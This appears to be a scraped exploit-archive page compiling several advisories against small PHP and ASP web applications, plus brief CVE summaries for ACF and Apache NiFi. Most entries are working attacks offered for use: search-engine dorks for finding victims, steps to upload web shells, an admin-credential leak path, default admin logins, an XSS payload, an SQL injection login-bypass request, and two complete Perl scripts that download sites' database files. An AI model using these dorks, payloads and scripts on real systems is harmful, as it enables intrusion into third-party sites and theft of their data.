Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

Emaar Real Estate Agency Directory System version 5.7 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92                           |  | # Dork      : "© 2019 Emaar. All Rights Reserved."                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Creat new user & login .[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit .[+] upload your Ev!l .[+] Uploaded malicious files can be run remotelyGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Emaar Real Estate Agency Directory System 5.7 Shell Upload

SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.

SQL injection bypass login:  
POST /O\_Blog-main/ HTTP/1.1  
Host: 192.168.150.131  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: PHPSESSID=9697cab5c5ac6b604b268d245e9a9519  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47

eposta=2384693535@qq.com'or 1=1#&sifre=31232132

CVE-2023-38899: sql sql injection · Issue #2 · berkaygediz/O_Blog

Cross-site scripting vulnerability in Advanced Custom Fields versions 6.1.0 to 6.1.7 and Advanced Custom Fields Pro versions 6.1.0 to 6.1.7 allows a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product with the administrative privilege.

CVE-2023-40068: Advanced Custom Fields (ACF)

Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.


CVE-2023-40037: Apache NiFi Security Reports

ExcessWeb and Network CMS version 4.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : ExcessWeb & Network CMS v4.0 Database Disclosure Vulnerability                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               |  
| # Vendor    : http://www.excessweb.co.th/                                                                                        |    
| # Dork      : Powered by ExcessWeb & Network                                                                                     |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# ExcessWeb & Network CMS v4.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('ExcessWeb & Network CMS v4.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/Webdatas.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

ExcessWeb And Network CMS 4.0 Database Disclosure

Evsanati Radyo version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : evsanati radyo v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti/                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave default credentials installed after installation.[+] Use Payload : user & pass = admin [+] panel = yonetim[+] http://127.0.0.1/wwwkacikfmcom/yonetim/home.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Evsanati Radyo 1.0 Insecure Settings

Event Locations CMS version 1.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS v1.0.1 - XSS Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] click 2 creat a Nouveau RDV & use payload : <script>alert(/indoushka/);</script>[+] http://127.0.0.1/cutgg/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Cross Site Scripting

Erim Upload version 4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Erim Upload V4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://script.horje.com/view/218412                                                                               |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (upload/veritabani/erimicel.mdb ) file  
    The (upload/veritabani/erimicel.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# Erim Upload V4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : script.horje.com/view/218412

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('Erim Upload V4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="upload/veritabani/erimicel.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/erimicel.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/erimicel.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

Tag

#firefox